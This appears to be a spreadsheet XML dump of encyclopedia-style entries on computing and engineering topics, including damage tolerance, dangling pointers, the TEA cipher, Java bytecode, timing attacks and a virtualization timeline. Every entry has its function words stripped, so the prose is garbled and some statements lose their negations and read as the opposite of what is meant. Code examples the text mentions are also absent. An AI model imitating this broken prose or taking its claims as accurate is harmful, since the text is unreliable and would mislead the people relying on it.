    <t>engineering, damage tolerance property structure relating ability sustain defects safely repair effected. approach engineering design account damage tolerance based assumption flaws exist structure flaws propagate usage. this approach commonly used aerospace engineering, mechanical engineering, civil engineering manage extension cracks structure application principles fracture mechanics. structure considered damage tolerant maintenance program implemented result detection repair accidental damage, corrosion fatigue cracking damage reduces residual strength structure acceptable limit. history structures upon human life depends long recognized needing element fail-safety. when describing flying machine, leonardo vinci noted constructing wings make chord bear strain looser position breaks strain, position serve function."prior 1970s, prevailing engineering philosophy aircraft structures ensure airworthiness maintained single part broken, redundancy requirement known fail-safety. however, advances fracture mechanics, along infamous catastrophic fatigue failures havilland comet prompted change requirements aircraft. discovered phenomenon known multiple-site damage could cause many small cracks structure, grow slowly themselves, join another time, creating much larger crack, significantly reducing expected time failure safe-life structure structure must demonstrate detectable crack propagation ensure safety operation. some structures operate safe-life design principle, extremely level risk accepted combination testing analysis part never form detectable crack fatigue service life part. this achieved significant reduction stresses typical fatigue capability part. safe-life structures employed cost infeasibility inspections outweighs weight penalty development costs associated safe-life structures. example safe-life component helicopter rotor blade. extremely large numbers cycles endured rotating component, undetectable crack grow critical length single flight aircraft lands, result catastrophic failure regular maintenance could prevented. damage tolerance analysis ensuring continued safe operation damage tolerant structure, inspection schedules devised. this schedule based many criteria, including: assumed initial damaged condition structure stresses structure (both fatigue operational maximum stresses) cause crack growth damaged condition geometry material intensifies reduces stresses crack ability material withstand cracking stresses expected environment largest crack size structure endure catastrophic failure likelihood particular inspection method reveal crack acceptable level risk certain structure completely failed expected duration manufacture detectable crack form assumption failure adjacent components effect changing stresses structure interestthese factors affect long structure operate normally damaged condition inspection intervals opportunity discover damaged state effect repair. interval inspections must selected certain minimum safety, also must balance expense inspections, weight penalty lowering fatigue stresses, opportunity costs associated structure service maintenance. non-destructive inspections manufacturers operators aircraft, trains, civil engineering structures like bridges financial interest ensuring inspection schedule cost-efficient possible. example aircraft, structures often revenue producing, opportunity cost associated maintenance aircraft (lost ticket revenue), addition cost maintenance itself. thus, maintenance desired performed infrequently, even increased intervals cause increased complexity cost overhaul. crack growth, shown fracture mechanics, exponential nature; meaning crack growth rate function exponent current crack size (see paris' law). this means largest cracks influence overall strength structure; small internal damages necessarily decrease strength. desire infrequent inspection intervals, combined exponential growth cracks structure development non-destructive testing methods allow inspectors look tiny cracks often invisible naked eye. examples technology include eddy current, ultrasonic, penetrant, x-ray inspections. catching structural cracks small, growing slowly, non-destructive inspections reduce amount maintenance checks, allow damage caught small, still inexpensive repair. example, repair achieved drilling small hole crack tip, thus effectively turning crack keyhole-notch. references further reading peggy miedlar; alan berens; allan gunderson gallagher, damage tolerant design handbook: guidelines analysis design damage tolerant aircraft structures, university dayton research institute, archived original july 2016, retrieved june 2016</t>
  </si>
  <si>
    <t>Damn Vulnerable Linux</t>
  </si>
  <si>
    <t>damn vulnerable linux (dvl) discontinued linux distribution geared toward computer security students. functioned tool observing studying vulnerabilities linux kernel popular user space software. available live dvd, could virtual machine within host operating system. history created thorsten schneider, founder teutohack laboratory bielefeld university, training system university lectures. design slax-based distribution, uses slackware .tgz package management system. uses outdated versions various software, deliberately make vulnerable operating system ever.dvl distributed live allowing booted directly distribution medium without installation within virtual machine. also linux portal references external links damn vulnerable linux official website</t>
  </si>
  <si>
    <t>Dan Gardopée</t>
  </si>
  <si>
    <t>daniel gardopée a.k.a. grandpre (a.k.a. basehead tracker community) american electronic musician former member game music production company straylight productions. active tracking community 1990s member groups five musicians kosmic free music foundation.as part straylight productions, music featured many games, including crusader: remorse, crusader: regret, unreal, unreal tournament deus gardopée co-composed three albums, atmospheres: cultures, atmospheres: moods atmospheres: pulses, together alexander brandon.in 2001, single track release basehead alias. this release titled beacon released netlabel monotonik records. since 2005, gardopée worked in-house games, primarily audio engineer series. also writes reviews pitchfork media. references external links modarchive.com music listing basehead gardopee grandpre mobygames beacon release monotonik</t>
  </si>
  <si>
    <t>Dangling pointer</t>
  </si>
  <si>
    <t>dangling pointers wild pointers computer programming pointers point valid object appropriate type. these special cases memory safety violations. more generally, dangling references wild references references resolve valid destination. dangling pointers arise object destruction, object incoming reference deleted deallocated, without modifying value pointer, pointer still points memory location deallocated memory. system reallocate previously freed memory, program dereferences (now) dangling pointer, unpredictable behavior result, memory contain completely different data. program writes memory referenced dangling pointer, silent corruption unrelated data result, leading subtle bugs extremely difficult find. memory reallocated another process, attempting dereference dangling pointer cause segmentation faults (unix, linux) general protection faults (windows). program sufficient privileges allow overwrite bookkeeping data used kernel's memory allocator, corruption cause system instabilities. object-oriented languages garbage collection, dangling references prevented destroying objects unreachable, meaning incoming pointers; ensured either tracing reference counting. however, finalizer create references object, requiring object resurrection prevent dangling reference. wild pointers arise pointer used prior initialization known state, possible programming languages. they show erratic behavior dangling pointers, though less likely stay undetected many compilers raise warning compile time declared variables accessed initialized. cause dangling pointers many languages (e.g., programming language) deleting object memory explicitly destroying stack frame return alter associated pointers. pointer still points location memory even though used purposes. straightforward example shown below: operating system able detect run-time references null pointers, solution assign (null) immediately inner block exited. another solution would somehow guarantee used without initialization. another frequent source dangling pointers jumbled combination malloc() free() library calls: pointer becomes dangling block memory points freed. previous example avoid make sure reset pointer null freeing reference—as demonstrated below. common misstep returning addresses stack-allocated local variable: called function returns, space variables gets deallocated technically "garbage values". attempts read pointer still return correct value (1234) calling func, functions called thereafter overwrite stack storage allocated values pointer would longer work correctly. pointer must returned, must scope beyond function—it might declared static. manual deallocation without dangling reference antoni kreczmar (1945-1996) created complete object management system free dangling reference phenomenon. similar approach proposed fisher leblanc name locks-and-keys. cause wild pointers wild pointers created omitting necessary initialization prior first use. thus, strictly speaking, every pointer programming languages enforce initialization begins wild pointer. this often occurs jumping initialization, omitting most compilers able warn this. security holes involving dangling pointers like buffer-overflow bugs, dangling/wild pointer bugs frequently become security holes. example, pointer used make virtual function call, different address (possibly pointing exploit code) called vtable pointer overwritten. alternatively, pointer used writing memory, data structure corrupted. even memory read pointer becomes dangling, lead information leaks interesting data next structure allocated there) privilege escalation now-invalid memory used security checks). when dangling pointer used freed without allocating chunk memory becomes known "use free" vulnerability. example, cve-2014-1776 use-after-free vulnerability microsoft internet explorer used zero-day attacks advanced persistent threat. avoiding dangling pointer errors simplest technique implement alternative version free() alike) function guarantees reset pointer. however, technique clear pointer variables contain copy pointer. alternative version used even guarantee validity empty pointer calling malloc(): these uses masked #define directives construct useful macros common #define xfree(ptr) safefree((void **)&amp;(ptr))), creating something like metalanguage embedded tool library apart. every case, programmers using technique safe versions every instance free() would used; failing leads problem. also, solution limited scope single program project, properly documented. among structured solutions, popular technique avoid dangling pointers smart pointers. smart pointer typically uses reference counting reclaim objects. some techniques include tombstones method locks-and-keys method.another approach boehm garbage collector, conservative garbage collector replaces standard memory allocation functions garbage collector. this approach completely eliminates dangling pointer errors disabling frees, reclaiming objects garbage collection. languages like java, dangling pointers cannot occur mechanism explicitly deallocate memory. rather, garbage collector deallocate memory, object longer reachable references. language rust, type system extended include also variables lifetimes resource acquisition initialization. unless disables features language, dangling pointers caught compile time reported programming errors. dangling pointer detection expose dangling pointer errors, common programming technique pointers null pointer invalid address storage point released. when null pointer dereferenced languages) program immediately terminate—there potential data corruption unpredictable behavior. this makes underlying programming mistake easier find resolve. this technique help multiple copies pointer. some debuggers automatically overwrite destroy data freed, usually specific pattern, 0xdeadbeef (microsoft's visual c/c++ debugger, example, uses 0xcc, 0xcd 0xdd depending freed). this usually prevents data reused making useless also prominent (the pattern serves show programmer memory already freed). tools polyspace, totalview, valgrind, mudflap, addresssanitizer, tools based llvm also used detect uses dangling pointers. other tools (softbound, insure++, checkpointer) instrument source code collect track legitimate values pointers ("metadata") check pointer access metadata validity. another strategy, suspecting small classes, temporarily make member functions virtual: class instance destructed/freed, pointer virtual method table null, call member function crash program show guilty code debugger. also common vulnerabilities exposures link memory debugger wild branch references</t>
  </si>
  <si>
    <t>Tiny Encryption Algorithm</t>
  </si>
  <si>
    <t>cryptography, tiny encryption algorithm (tea) block cipher notable simplicity description implementation, typically lines code. designed david wheeler roger needham cambridge computer laboratory; first presented fast software encryption workshop leuven 1994, first published proceedings workshop.the cipher subject patents. properties operates 32-bit unsigned integers (could derived 64-bit data block) uses 128-bit key. feistel structure suggested rounds, typically implemented pairs termed cycles. extremely simple schedule, mixing material exactly cycle. different multiples magic constant used prevent simple attacks based symmetry rounds. magic constant, 2654435769 0x9e3779b9 chosen ⌊232/ϕ⌋, golden ratio nothing-up-my-sleeve number).tea weaknesses. most notably, suffers equivalent keys—each equivalent three others, means effective size bits. result, especially cryptographic hash function. this weakness method hacking microsoft's xbox game console, cipher used hash function. also susceptible related-key attack requires chosen plaintexts related-key pair, time complexity. because weaknesses, xtea cipher designed. versions first published version supplemented second version incorporated extensions make secure. block (which specified along xtea) operates arbitrary-size blocks place 64-bit blocks original. third version (xxtea), published 1998, described improvements enhancing security block algorithm. reference code following adaptation reference encryption decryption routines released public domain david wheeler roger needham: note reference implementation acts multi-byte numeric values. original paper specify derive numbers acts binary content. also stream cipher that, like tea, designed simple implement. xtea first version block tea's successor. xxtea corrected block tea's successor. treyfer simple compact encryption algorithm 64-bit size block size. notes references andem, vikram reddy (2003). cryptanalysis tiny encryption algorithm, masters thesis" (pdf). tuscaloosa: university alabama. {{cite journal}}: cite journal requires |journal= (help) hernández, julio césar; isasi, pedro; ribagorda, arturo (2002). application genetic algorithms cryptoanalysis round tea". proceedings 2002 symposium artificial intelligence application. hernández, julio césar; sierra, josé maría; isasi, pedro; ribargorda, arturo (2003). finding efficient distinguishers cryptographic mappings, application block cipher tea. proceedings 2003 congress evolutionary computation. vol. 2189–2193. doi:10.1109/cec.2003.1299943. hdl:10016/3944. isbn 978-0-7803-7804-9. s2cid 62216777. hernández, julio césar; sierra, josé maría; ribagorda, arturo; ramos, benjamín; mex-perera, (2001). distinguishing random permutation: reduced round versions generate random numbers (pdf). proceedings int. conf. cryptography coding 2001. lecture notes computer science. vol. 2260. 374–377. doi:10.1007/3-540-45325-3_34. isbn 978-3-540-43026-1. archived original (pdf) april 2012. moon, dukjae; hwang, kyungdeok; lee, wonil; lee, sangjin; lim, jongin (2002). impossible differential cryptanalysis reduced round xtea (pdf). lecture notes computer science. vol. 2365. 49–60. doi:10.1007/3-540-45661-9_4. isbn 978-3-540-44009-3. hong, seokhie; hong, deukjo; youngdai; chang, donghoon; lee, wonil; lee, sangjin (2003). differential cryptanalysis xtea. proceedings icisc 2003. lecture notes computer science. vol. 2971. 402–417. doi:10.1007/978-3-540-24691-6_30. isbn 978-3-540-21376-5. external links test vectors javascript implementation xxtea base64 implementation xtea (german language) javascript implementation xxtea javascript implementations xtea (dutch text) implementation scalable encryption algorithm small embedded applications (standaert, piret, gershenfeld, quisquater july 2005 belgium usa)</t>
  </si>
  <si>
    <t>Java bytecode</t>
  </si>
  <si>
    <t>java bytecode bytecode-structured instruction java virtual machine (jvm). relation java java programmer need aware understand java bytecode all. however, suggested developerworks journal, "understanding bytecode bytecode likely generated java compiler helps java programmer knowledge assembly helps programmer." instruction architecture stack machine register machine. each frame method call "operand stack" array "local variables".: operand stack used operands computations receiving return value called method, local variables serve purpose registers also used pass method arguments. maximum size operand stack local variable array, computed compiler, part attributes method.: 4.7.3 each independently sized 65535 values, value bits. long double types, bits, take consecutive local variables: 2.6.1 (which need 64-bit aligned local variables array) value operand stack (but counted units depth stack).: 2.6.2 instruction each bytecode composed byte represents opcode, along zero bytes operands.: 2.11 possible byte-long opcodes, 2015, (~79%), reserved future (~20%), instructions (~1%) permanently reserved implementations use.: (impdep1 impdep2) provide traps implementation-specific software hardware, respectively. third used debuggers implement breakpoints. instructions fall number broad groups: load store (e.g. aload_0, istore) arithmetic logic (e.g. ladd, fcmpl) type conversion (e.g. i2b, d2i) object creation manipulation (new, putfield) operand stack management (e.g. swap, dup2) control transfer (e.g. ifeq, goto) method invocation return (e.g. invokespecial, areturn)there also instructions number specialized tasks exception throwing, synchronization, etc. many instructions prefixes and/or suffixes referring types operands operate on.: 2.11.1 these follows: example, iadd integers, dadd doubles. const, load, store instructions also take suffix form number load store. maximum const differs type. const instructions push value specified type onto stack. example, iconst_5 push integer value) value onto stack, dconst_1 push double floating point value) value onto stack. there also aconst_null, pushes null reference. load store instructions specifies index local variable array load store aload_0 instruction pushes object local variable onto stack (this usually object). istore_1 stores integer stack local variable local variables beyond suffix dropped operands must used. example consider following java code: java compiler might translate java code bytecode follows, assuming method: generation common language targeting java virtual machine producing java bytecode java. originally compiler existed, javac compiler microsystems, compiles java source code java bytecode; specifications java bytecode available, parties supplied compilers produce java bytecode. examples compilers include: eclipse compiler java (ecj) jikes, compiles java java bytecode (developed ibm, implemented c++) espresso, compiles java java bytecode (java only) compiler java (gcj), compiles java java bytecode; also compile native machine code part compiler collection (gcc) version 6.some projects provide java assemblers enable writing java bytecode hand. assembly code also generated machine, example compiler targeting java virtual machine. notable java assemblers include: jasmin, takes text descriptions java classes, written simple assembly-like syntax using java virtual machine instruction generates java class file jamaica, macro assembly language java virtual machine. java syntax used class interface definition. method bodies specified using bytecode instructions. krakatau bytecode tools, currently contains three tools: decompiler disassembler java classfiles assembler create classfiles. lilac, assembler disassembler java virtual machine.others developed compilers, different programming languages, target java virtual machine, coldfusion jruby jython, scripting languages based ruby python apache groovy, optionally typed dynamic general-purpose language, static-typing static compilation capabilities scala, type-safe general-purpose programming language supporting object-oriented functional programming jgnat appletmagic, compile language java bytecode java byte-code compilers clojure, functional, immutable, general-purpose programming language lisp family strong emphasis concurrency kawa, implementation scheme programming language, also dialect lisp. midletpascal javafx script code compiled java bytecode kotlin, statically-typed general-purpose programming language type inference object pascal source code compiled java bytecode using free pascal 3.0+ compiler. execution there several java virtual machines available today execute java bytecode, free commercial products. executing bytecode virtual machine undesirable, developer also compile java source code bytecode directly native machine code tools compiler java (gcj). some processors execute java bytecode natively. such processors termed java processors. support dynamic languages java virtual machine provides support dynamically typed languages. most extant instruction statically typed sense method calls signatures type-checked compile time, without mechanism defer decision time, choose method dispatch alternative approach.jsr (supporting dynamically typed languages java platform) added invokedynamic instruction level, allow method invocation relying dynamic type checking (instead extant statically type-checked invokevirtual instruction). vinci machine prototype virtual machine implementation hosts extensions aimed supporting dynamic languages. jvms supporting also include invokedynamic opcode. also java bytecode instruction listings java class file list languages java backporting tools java virtual machine compilers jstik common intermediate language (cil), microsoft's rival java bytecode objectweb byte code engineering library references external links oracle's java virtual machine specification programming languages java virtual machine bytecode visualizer bytecode viewer debugger (free eclipse plugin) adaptj stacktrace bytecode level debugging full control stack, local variables, execution flow java class unpacker plugin total commander, lets open class files compressed archives fields methods files. bytecode viewed text using</t>
  </si>
  <si>
    <t>Tinfoil Hat Linux</t>
  </si>
  <si>
    <t>tinfoil linux (thl) compact security-focused linux distribution designed high security developed shmoo group. first version (1.000) released february 2002. 2013, become low-priority project. image files source available gzip format. used almost modern requires intel 80386 better, least ram. distribution fits single floppy disk. small footprint provides additional benefits beyond making system easy understand verify- computer need even hard drive, making easier "sanitize" computer use. logo tinfoil tux, linux mascot, wearing tinfoil hat. shmoo group site says started secure, single floppy, bootable linux distribution storing keys encrypting, signing wiping files. point became exercise over-engineering." security features tinfoil uses number measures defeat hardware software surveillance methods like keystroke logging, video camera, tempest: encryption privacy guard (gpg) public cryptography software included thl. data retrieval temporary files created encrypted ramdisk destroyed shutdown. even keyfile information stored encrypted floppy. keystroke monitoring gpggrid, wrapper lets video game style character entry system instead typing passphrase. keystroke loggers grid points, instead passphrase. power usage side channel attacks under paranoid options, copy runs background generating keys encrypting random documents. this makes harder determine real encryption taking place. even reading screen user's shoulder hard tinfoil switched paranoid mode, sets screen contrast. applications advantage used virtually modern using processor architecture. example, might install computer kept locked room, connected network, used cryptographically signing keys. fairly easy create tinfoil booting floppy microsoft windows. verifying checksum tricky. text documentation salted jokes, reinforces humor stark contrast serious paranoiac tone surrounding text- name pokes itself, tinfoil hats commonly ascribed paranoiacs method protecting oneself mind-control waves. tinfoil linux requires work text-only environment linux, i.e. starting straight bourne shell editor graphical user interface. uses busybox instead normal util-linux, coreutils (formerly known fileutils, shellutils textutils) common unix tools. tinfoil also offers nano text editor. also list livedistros damn small linux security-focused operating system openbsd references external links official website evilmutant.com article tinfoil linux, screenshots another evilmutant.com article giving links media picked previous article</t>
  </si>
  <si>
    <t>Dar (disk archiver)</t>
  </si>
  <si>
    <t>(disk archive) computer program, command-line archiving tool intended replacement unix-like operating systems. features support slices, archives split multiple files particular size option deleting files system removed archive full backup differential backup incremental backup, decremental backup takes care type inode (directory, plain files, symlinks, special devices, named pipes, sockets, doors, ...) takes care hard-linked inodes (hard-linked plain files, char devices, block devices, hard-linked symlinks) takes care sparse files takes care linux file extended attributes, takes care linux file takes care file forks takes care filesystem specific attributes like birthdate hfs+ filesystem immutable, data-journaling, secure-deletion, no-tail-merging, undeletable, noatime attributes ext2/3/4 filesystem. per-file compression gzip, bzip2, lzo, lzma opposed compressing whole archive). individual choose compress already compressed files based filename suffix. fast-extracting files anywhere archive fast listing archive contents saving catalogue files archive optional blowfish, twofish, aes, serpent, camellia encryption optional public encryption signature (openpgp) live filesystem backup: detects file modified read backup retry saving given maximum number retries hash file (md5, sha1 sha-512) generated on-fly slice, resulting file compatible md5sum sha1sum, able quickly check slice's integrity filesystem independent: used restore system partition different size and/or partition different filesystem frontends there frontends called: kdar linux, specifically kde, dargui linux windows, gdar linux.a text-mode browser/extractor: plugin files (midnight commander). scheduler command-line frontend known sarab allows towers hanoi, grandfather-father-son, custom backup rotation strategy, modifications available file support. extended versions known bzsarab baras also available. also list file archivers list archive formats comparison archive formats references external links homepage</t>
  </si>
  <si>
    <t>Tinc (protocol)</t>
  </si>
  <si>
    <t>tinc open-source, self-routing, mesh networking protocol software implementation used compressed encrypted virtual private networks. started 1998 guus sliepen, timmermans, wessel dankers, released gpl-licensed project. platforms tinc available linux, freebsd, openbsd, netbsd, dragonfly bsd, microsoft windows, solaris, (jailbroken only), android full support ipv6. future goals authors tinc goals providing platform secure, stable, reliable, scalable, easily configurable, flexible. embedded technologies tinc uses openssl libressl encryption library gives options compressing communications zlib "best compression" "fast compression". projects tinc freifunk tinc enabled routers october 2006. openwrt installable package tinc. opnsense, open source router firewall distribution, plugin tinc pfsense installable package release. tomato variants shibby freshtomato include tinc support. mesh uses tinc connect parts mesh public internet would otherwise range. also stunnel, encrypts connection (single port service) openvpn, open source solution vtun, open source solution bridge ethernet references external links official website tinc github protocol documentation</t>
  </si>
  <si>
    <t>Timing attack</t>
  </si>
  <si>
    <t>cryptography, timing attack side-channel attack attacker attempts compromise cryptosystem analyzing time taken execute cryptographic algorithms. every logical operation computer takes time execute, time differ based input; precise measurements time operation, attacker work backwards input. finding secrets timing information significantly easier using cryptanalysis known plaintext, ciphertext pairs. sometimes timing information combined cryptanalysis increase rate information leakage.information leak system measurement time takes respond certain queries. much information help attacker depends many variables: cryptographic system design, running system, algorithms used, assorted implementation details, timing attack countermeasures, accuracy timing measurements, etc. timing attacks applied algorithm data-dependent timing variation. removing timing-dependencies difficult algorithms low-level operations frequently exhibit varied execution time. timing attacks often overlooked design phase dependent implementation introduced unintentionally compiler optimizations. avoidance timing attacks involves design constant-time functions careful testing final executable code. avoidance many cryptographic algorithms implemented masked proxy) reduces eliminates data-dependent timing information, constant-time algorithm. consider implementation every call subroutine always returns exactly seconds, maximum time ever takes execute routine every possible authorized input. implementation, timing algorithm less likely leak information data supplied invocation. downside approach time used executions becomes worst-case performance function. data-dependency timing stem following: non-local memory access, cache data. software data cache exhibit data-dependent timing variations result memory looks cache. conditional jumps. modern cpus speculatively execute past jumps guessing. guessing wrong (not uncommon essentially random secret data) entails measurable large delay tries backtrack. this requires writing branch-free code. some "complicated" mathematical operations, depending actual hardware: integer division almost always non-constant time. uses microcode loop uses different code path either divisor dividend small. cpus without barrel shifter runs shifts rotations loop, position time. result, amount shift must secret. older cpus multiplications similar division. examples execution time square-and-multiply algorithm used modular exponentiation depends linearly number bits key. while number bits alone nearly enough information make finding easy, repeated executions different inputs used perform statistical correlation analysis timing information recover completely, even passive attacker. observed timing measurements often include noise (from sources network latency, disk drive access differences access access, error correction techniques used recover transmission errors). nevertheless, timing attacks practical number encryption algorithms, including rsa, elgamal, digital signature algorithm. 2003, boneh brumley demonstrated practical network-based timing attack ssl-enabled servers, based different vulnerability chinese remainder theorem optimizations. actual network distance small experiments, attack successfully recovered server private matter hours. this demonstration widespread deployment blinding techniques implementations. context, blinding intended remove correlations encryption time.some versions unix relatively expensive implementation crypt library function hashing 8-character password 11-character string. older hardware, computation took deliberately measurably long time: much three seconds cases. login program early versions unix executed crypt function login name recognized system. this leaked information timing validity login name, even password incorrect. attacker could exploit leaks first applying brute-force produce list login names known valid, attempt gain access combining names large passwords known frequently used. without information validity login names time needed execute approach would increase orders magnitude, effectively rendering useless. later versions unix fixed leak always executing crypt function, regardless login name validity.two otherwise securely isolated processes running single system either cache memory virtual memory communicate deliberately causing page faults and/or cache misses process, monitoring resulting changes access times other. likewise, application trusted, paging/caching affected branching logic, possible second application determine values data compared branch condition monitoring access time changes; extreme examples, allow recovery cryptographic bits.the 2017 meltdown spectre attacks forced manufacturers (including intel, amd, arm, ibm) redesign cpus rely timing attacks. early 2018, almost every computer system world affected spectre, making powerful example timing attack history. algorithm following code demonstrates typical insecure string comparison stops testing soon character match. example, comparing "abcde" "abxde" return loop iterations: comparison, following version runs constant-time testing characters using bitwise operation accumulate result: world library functions, first function analogous memcmp(), latter analogous netbsd's consttime_memequal() openbsd's timingsafe_bcmp() timingsafe_memcmp. systems, comparison function cryptographic libraries like openssl libsodium used. notes timing attacks easier mount adversary knows internals hardware implementation, even cryptographic system use. since cryptographic security never depend obscurity either (see security obscurity, specifically shannon's maxim kerckhoffs's principle), resistance timing attacks either. nothing else, exemplar purchased reverse engineered. timing attacks side-channel attacks also useful identifying, possibly reverse-engineering, cryptographic algorithm used device. references further reading paul kocher. timing attacks implementations diffie-hellman, rsa, dss, other systems. crypto 1996: 104–113 lipton, richard; naughton, jeffrey (march 1993). "clocked adversaries hashing". algorithmica. (3): 239–252. doi:10.1007/bf01190898. s2cid 19163221. reparaz, oscar; balasch, josep; verbauwhede, ingrid (march 2017). "dude, code constant time?" (pdf). design, automation test europe conference exhibition (date), 2017: 1697–1702. doi:10.23919/date.2017.7927267. isbn 978-3-9815370-8-6. s2cid 35428223. describes dudect, simple program times piece code different data.</t>
  </si>
  <si>
    <t>Deep Packet Capture</t>
  </si>
  <si>
    <t>Timestamping (computing)</t>
  </si>
  <si>
    <t>computing timestamping refers electronic timestamp provide temporal order among events. timestamping techniques used variety computing fields, network management computer security concurrency control. instance, heartbeat network uses timestamping monitor nodes high availability computer cluster.timestamping computer files (updating timestamp per-file metadata every time file modified) makes possible efficient build automation tools. also trusted timestamping timestamp-based concurrency control references</t>
  </si>
  <si>
    <t>Timeline of virtualization development</t>
  </si>
  <si>
    <t>following timeline virtualization development. computing, virtualization computer simulate another computer. through virtualization, host simulates guest exposing virtual hardware devices, done software allowing access physical device connected machine. timelines note: this timeline missing data important historical systems, including: atlas computer (manchester), 645, burroughs b5000 1964 cambridge scientific center begins development cp-40. 1965 m44/44x, experimental paging system, thomas watson research center. announces system/360-67, 32-bit virtual memory hardware (august 1965). 1966 ships s/360-67 computer june 1966 begins work cp-67, reimplementation cp-40 s/360-67. 1967 cp-40 (january) cp-67 (april) production time-sharing use. 1968 cp/cms installed eight initial customer sites. cp/cms submitted type-iii library mit's lincoln laboratory, making system available s/360 customers charge source code form. resale cp/cms access begins time-sharing vendor national (becoming distinct version, eventually renamed vp/css). 1970 system/370 announced (june) without virtual memory. work begins cp-370, complete reimplementation cp-67, system/370 series. 1971 first system/370 shipped: s/370-155 (january). 1972 announcement virtual memory added system/370 series. vm/370 announced running announcement date. vm/370 includes ability (previously implemented user sites cp/cms, made part standard releases). 1973 first shipment announced virtual memory s/370 models (april: -158, may: -168). 1974–1998 [ongoing history family vp/css.] 1977 initial commercial release vax/vms, later renamed openvms. 1985 october 1985: announcement intel 80286-based at&amp;t 6300+ simultask, virtual machine monitor developed locus computing corporation collaboration at&amp;t, enabled direct execution intel 8086 guest operating system host unix system release although product marketed microsoft ms-dos guest fact virtual machine could support realmode operating system standalone program (such microsoft flight simulator) written using valid 8086 instructions (not instructions introduced 80286). locus subsequently developed technology "merge" product line. 1987 january 1987: "product evaluation" version merge/386 locus computing corporation made available oems. merge/386 made virtual 8086 mode provided intel 80386 processor, supported multiple simultaneous virtual 8086 machines. virtual machines supported unmodified guest operating systems standalone programs microsoft flight simulator; typical usage guest ms-dos locus proprietary redirector (also marketed networked "pc-interface") "network" driver provided communication regular user-mode file server process running host operating system machine. october 1987: retail version merge/386 began shipping, offered microport unix system release 1988 softpc introduced 1988 insignia solutions softpc appears first version apple macintosh. these versions (sun macintosh) support dos. 1991 introduced os/2 virtual machine (vdm) support virtual 8086 mode, capable virtualize dos/windows bits operating systems, like cp/m-86 1994 kevin lawton leaves lincoln start bochs project. bochs initially coded architecture, capable emulating bios, processor x86-compatible hardware, simple algorithms, isolated rest environment, eventually incorporating ability different processor algorithms x86-architecture host, including bios core processor (itanium x64, x86_64, arm, mips, powerpc, etc.), advantage application multi platform (bsd, linux, windows, mac, solaris). 1997 first version virtual macintosh platform released june 1997 connectix 1998 june 1998, simics/sun4m presented usenix'98, demonstrating full system simulation booting linux 2.0.30 solaris unmodified (unix):ed disks. october 1998, vmware filed patent techniques, granted u.s. patent 6,397,242 1999 february 1999, vmware introduced vmware virtual platform intel ia-32 architecture. 2000 freebsd released, including initial implementation freebsd jails announces z/vm, version ibm's 64-bit z/architecture 2001 january 2001, virtutech release simics/x86-64 ("virtuhammer") support 64-bit architecture x86. virtuhammer used port linux distributions windows kernel x86-64 well first x86-64 processor (opteron) available april 2003. june, connectix launches first version virtual windows.[6] july, vmware created first server virtualization product.[7] egenera, inc. launches processor area network (pan manager) software bladeframe chassis provide hardware virtualization processing blade's (pblade) internal disk, network interface cards, serial console.[8] 2003 first release first open-source hypervisor, february 2003, microsoft acquired virtualization technologies (virtual unreleased product called "virtual server") connectix corporation. [10] late 2003, acquired vmware $635 million. late 2003, veritas acquired ejascent million. november 2003 microsoft releases microsoft virtual machine-level virtualization technology, ease transition windows 2005 releases integrity virtual machines hp-ux october 2005 vmware releases vmware player, free player virtual machines, masses. releases solaris (operating system) including solaris zones, x86/x64 sparc systems 2006 july 2006 vmware releases vmware server, free machine-level virtualization product server market. microsoft virtual 2006 released free program, also july. july 2006 microsoft bought softricity. august 2006 vmware announces winners virtualization appliance contest. september 2006 moka5 delivers livepc technology. releases integrity virtual machines version 2.0, supports windows server 2003, burners, tape drives vlan. december 2006 virtual iron releases virtual iron 3.1, free bare metal virtualization product enterprise server virtualization market. 2007 open source released integrated linux kernel provides virtualization linux system, needs hardware support. january 2007 innotek released virtualbox open source edition (ose), first professional virtualization solution released open source general public license (gpl). includes code qemu project. releases solaris containers enable migration solaris computer solaris container solaris system sparc 2008 january 2008 vmware, inc. announced entered definitive agreement acquire thinstall, privately held application virtualization software company. february 2008 microsystems announced entered stock purchase agreement acquire innotek, makers virtualbox. april, vmware releases vmware workstation beta, first program windows linux enable directx accelerated graphics windows guests [11]. 2013 march 2013 docker, inc. releases docker, series platform service (paas) products os-level virtualization. year 1960 mid-1960s, ibm's cambridge scientific center developed cp-40, first version cp/cms. went production january 1967. from inception, cp-40 intended implement full virtualization. doing required hardware microcode customization s/360-40, provide necessary address translation virtualization features. experience cp-40 project provided input development system/360-67, announced 1965 (along ill-starred operating system, tss/360). cp-40 reimplemented s/360-67 cp-67, april 1967, versions daily production use. cp/cms made generally available customers source code form, part unsupported type-iii library, 1968. year 1970 announced system/370 1970. disappointment cp/cms users system/360 announcement series would include virtual memory. 1972, changed direction, announcing option would made available s/370 models, also announcing several virtual storage operating systems, including vm/370. mid-1970s, cp/cms, maverick vp/css running numerous large mainframes. late 80s, reported licenses licenses. year 1999 february 1999, vmware introduced first virtualization product, vmware virtual platform, based earlier research founders stanford university. vmware virtual platform based software emulation guest/host design required guest environments stored files host filesystem. year 2008 vmware releases vmware workstation beta, first program windows linux enable directx accelerated graphics windows guests [12]. year 2013 docker, inc. releases docker, series platform service (paas) products os-level virtualization. overview overview, three levels virtualization: hardware level, multiple guest oses. this best used testing training require networking interoperability oses, since guest oses different host many guest vms, long enough cpu, storage space. introduced around 1990 name logical partitioning (lpar), first mainframe field. operating system level, virtualize guest host this similar many terminal server sessions without locking desktop. thus, best worlds, speed session benefit full access desktop virtual machine, user still control quotas cpu, hdd. similar hardware level, still considered server virtualization guest address, used networking applications hosting. application level, running host directly, without guest locked desktop, including terminal server session. this called application virtualization desktop virtualization, virtualizes front-end, whereas server virtualization virtualizes back-end. now, application streaming refers delivering applications directly onto desktop running locally. traditionally terminal server computing, applications running server, locally, streaming screenshots onto desktop. application virtualization application virtualization solutions vmware thinapp, softricity, trigence attempt separate application specific files settings host operating system, thus allowing more-or-less isolated sandboxes without installation without memory disk overhead full machine virtualization. application virtualization tightly tied host thus translate operating systems hardware. vmware thinapp softricity intel windows centric, trigence supports linux solaris. unlike machine virtualization, application virtualization code emulation translation related benchmarks changes, though filesystem benchmarks experience performance degradation. windows, vmware thinapp softricity essentially work intercepting filesystem registry requests application redirecting requests preinstalled isolated sandbox, thus allowing application without installation changes local though vmware thinapp softricity began independent development around 1998, behind scenes vmware thinapp softricity implemented using different techniques: vmware thinapp works packaging application single "packaged" includes runtime plus application data files registry. vmware thinapp’s runtime loaded windows normal windows application, runtime replaces windows loader, filesystem, registry target application presents merged image host application previously installed. vmware thinapp replaces related functions host application, example readfile supplied application must pass vmware thinapp reaches operating system. application reading virtual file, vmware thinapp handles request otherwise request passed 